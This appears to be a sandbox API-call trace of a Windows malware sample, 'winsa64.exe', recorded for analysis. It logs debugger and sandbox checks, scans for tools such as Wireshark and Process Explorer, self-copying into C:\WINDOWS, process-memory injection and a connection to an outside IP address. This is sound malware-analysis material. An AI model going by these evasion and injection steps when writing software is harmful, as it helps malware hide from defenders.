IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
Executing: c:\windows\winsa64.exe
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(iexplore.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(firefox.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
ResumeThread() [c:\windows\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]
Executing: c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(comdlg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(STATIC,000003C4_PID_FastMM) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(psapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETMENUANIMATION,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(TXmInstanceManager,HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetWindowTextLength() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Tools\HxD\HxD.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETKEYBOARDCUES,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(1098a) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp2res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(xpsp3res.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
SetTimer(0) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetKeyState() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenService(AudioSrv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\setupapi.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\wdmaud.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(msacm32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\msacm32.drv) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_modLongMessage_RefCnt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateMutex(MidiMapper_Configure) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\midimap.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\faultrep.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(winsta.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(wtsapi32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPMODULE,964) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
FreeLibrary(C:\WINDOWS\system32\apphelp.dll) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
CreateProcess((null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\dwwin.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\dwwin.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\dwwin.exe
LoadLibrary(advapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(urlmon.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iertutil.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(user32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(version.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(wininet.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(normaliz.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\dwwin.exe]
